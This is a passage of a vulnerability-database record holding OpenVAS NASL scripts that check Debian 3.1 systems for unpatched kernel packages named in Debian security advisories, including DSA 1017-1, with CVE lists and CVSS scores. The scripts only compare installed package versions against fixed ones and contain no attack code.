ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-itanium-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-mckinley\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-itanium-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-mckinley-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-itanium\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-itanium\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-mckinley-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-itanium-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-mckinley\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-mckinley\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-itanium\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-mvme147\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-amiga\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-mvme16x\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-bvme6000\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-q40\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-atari\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-mac\", ver:\"2.4.27-3sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r5k-ip22\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r4k-ip22\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-sb1-swarm-bn\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mips-tools\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r5k-lasat\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r5k-cobalt\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-xxs1500\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r4k-kn04\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-r3k-kn02\", ver:\"2.4.27-10.sarge2.040815-1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-powerpc-small\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-powerpc-small\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-powerpc\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-powerpc-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-apus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-powerpc-smp\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-build-2.4.27-nubus\", ver:\"2.4.27-10sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-s390x\", ver:\"2.4.27-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-s390\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-s390\", ver:\"2.4.27-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-s390x\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-s390\", ver:\"2.4.27-1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-s390-tape\", ver:\"2.4.27-2sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc32\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc32-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc64-smp\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc32\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc64-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc32\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc64\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc32-smp\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc32-smp\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc64\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.27-3-sparc64-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4-sparc64\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc64\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.27-3-sparc32-smp\", ver:\"2.4.27-9sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc32\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4-sparc64-smp\", ver:\"42sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3784", "CVE-2005-3783", "CVE-2005-2457", "CVE-2005-3358", "CVE-2006-0096", "CVE-2005-3181", "CVE-2005-3858", "CVE-2005-0124", "CVE-2005-2490", "CVE-2006-1066", "CVE-2005-3356", "CVE-2005-3053", "CVE-2005-4618", "CVE-2005-3044", "CVE-2005-3806", "CVE-2005-3257", "CVE-2005-3848", "CVE-2005-2800", "CVE-2004-1017", "CVE-2005-4605", "CVE-2005-2709", "CVE-2006-0095", "CVE-2006-0482", "CVE-2005-2973", "CVE-2005-3180", "CVE-2005-3847", "CVE-2005-0449", "CVE-2005-3857", "CVE-2005-3055", "CVE-2005-2555"], "description": "The remote host is missing an update to kernel-source-2.6.8\nannounced via advisory DSA 1017-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56469", "href": "http://plugins.openvas.org/nasl.php?oid=56469", "type": "openvas", "title": "Debian Security Advisory DSA 1017-1 (kernel-source-2.6.8)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1017_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1017-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several local and remote vulnerabilities have been discovered in the Linux\nkernel that may lead to a denial of service or the execution of arbitrary\ncode. For details on the issues addressed by the missing update, please visit\nthe referenced security advisories.\n\nThe following matrix explains which kernel version for which architecture\nfix the problems mentioned above:\n\nDebian 3.1 (sarge)\nSource 2.6.8-16sarge2\nAlpha architecture 2.6.8-16sarge2\nAMD64 architecture 2.6.8-16sarge2\nHP Precision architecture 2.6.8-6sarge2\nIntel IA-32 architecture 2.6.8-16sarge2\nIntel IA-64 architecture 2.6.8-14sarge2\nMotorola 680x0 architecture 2.6.8-4sarge2\nPowerPC architecture 2.6.8-12sarge2\nIBM S/390 architecture 2.6.8-5sarge2\nSun Sparc architecture 2.6.8-15sarge2\n\nThe following matrix lists additional packages that were rebuilt for\ncompatibility with or to take advantage of this update:\n\nDebian 3.1 (sarge)\nkernel-latest-2.6-alpha 101sarge1\nkernel-latest-2.6-amd64 103sarge1\nkernel-latest-2.6-hppa 2.6.8-1sarge1\nkernel-latest-2.6-sparc 101sarge1\nkernel-latest-2.6-i386 101sarge1\nkernel-latest-powerpc 102sarge1\nfai-kernels 1.9.1sarge1\nhostap-modules-i386 0.3.7-1sarge1\nmol-modules-2.6.8 0.9.70+2.6.8+12sarge1\nndiswrapper-modules-i386 1.1-2sarge1\n\nWe recommend that you upgrade your kernel package immediately and reboot\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.6.8\nannounced via advisory DSA 1017-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201017-1\";\n\nif(description)\n{\n script_id(56469);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2004-1017\", \"CVE-2005-0124\", \"CVE-2005-0449\", \"CVE-2005-2457\", \"CVE-2005-2490\", \"CVE-2005-2555\", \"CVE-2005-2709\", \"CVE-2005-2800\", \"CVE-2005-2973\", \"CVE-2005-3044\", \"CVE-2005-3053\", \"CVE-2005-3055\", \"CVE-2005-3180\", \"CVE-2005-3181\", \"CVE-2005-3257\", \"CVE-2005-3356\", \"CVE-2005-3358\", \"CVE-2005-3783\", \"CVE-2005-3784\", \"CVE-2005-3806\", \"CVE-2005-3847\", \"CVE-2005-3848\", \"CVE-2005-3857\", \"CVE-2005-3858\", \"CVE-2005-4605\", \"CVE-2005-4618\", \"CVE-2006-0095\", \"CVE-2006-0096\", \"CVE-2006-0482\", \"CVE-2006-1066\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1017-1 (kernel-source-2.6.8)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-generic\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-generic\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2\", ver:\"2.6.8-15sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-generic\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3\", ver:\"2.6.8-15sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-generic\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-generic\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-generic\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-amd64-generic\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-amd64-k8\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-amd64-k8-smp\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-em64t-p4\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-em64t-p4-smp\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-amd64-generic\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-amd64-k8\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-amd64-k8-smp\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-em64t-p4\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-em64t-p4-smp\", ver:\"103sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-11\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-11-amd64-generic\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-11-amd64-k8\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-11-amd64-k8-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-11-em64t-p4\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-11-em64t-p4-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-12\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-12-amd64-generic\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-12-amd64-k8\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-12-amd64-k8-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-12-em64t-p4\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-12-em64t-p4-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-11-amd64-generic\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-11-amd64-k8\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-11-amd64-k8-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-11-em64t-p4\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-11-em64t-p4-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-12-amd64-generic\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-12-amd64-k8\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-12-amd64-k8-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-12-em64t-p4\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-12-em64t-p4-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-386\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-686\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-686-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-k7\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6-k7-smp\", ver:\"101sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"fai-kernels\", ver:\"1.9.1sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-386\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-686\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-686-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-k7\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-2-k7-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-386\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-686\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-686-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-k7\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.6.8-3-k7-smp\", ver:\"2.6.8-16sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-386\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-686\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-686-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-k7\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-2-k7-smp\", ver:\"2.6.8-16sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.6.8-3-386\", ver:\"2.6.8-16sarge2\", 